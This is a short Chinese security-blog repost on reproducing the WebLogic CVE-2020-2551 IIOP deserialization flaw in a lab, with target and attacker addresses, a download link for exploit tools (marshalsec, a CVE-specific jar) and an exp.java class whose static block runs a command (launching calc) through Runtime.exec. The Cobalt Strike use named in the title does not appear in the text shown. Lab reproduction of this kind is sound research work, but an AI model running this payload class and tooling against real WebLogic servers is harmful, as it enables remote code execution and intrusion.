Weblogic CVE-2020-2551漏洞复现&CS实战利用

  • A+
所属分类:安全文章

Weblogic CVE-2020-2551漏洞复现

Weblogic IIOP 反序列化

漏洞原理

https://www.anquanke.com/post/id/199227#h3-7 https://www.cnblogs.com/tr1ple/p/12483235.html

漏洞复现

Weblogic CVE-2020-2551复现过程

靶机:windows7系统 

IP地址:192.168.43.20 

攻击机:windows10系统

IP地址:192.168.43.38

工具下载地址https://pan.baidu.com/s/1N9oW3PtJJpkGC-W-LkgW9A 提取码:03vx

exp.javamarshalsec-0.0.3-SNAPSHOT-all.jarweblogic_CVE_2020_2551.jar
Weblogic CVE-2020-2551漏洞复现&CS实战利用
  • exp.java源代码

import java.io.IOException;public class exp {  static{    try {      java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});    } catch (IOException e) {      e.printStackTrace();    }  }  public static void main(String[] args) {      }}

本文始发于微信公众号(HACK学习呀):Weblogic CVE-2020-2551漏洞复现&CS实战利用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: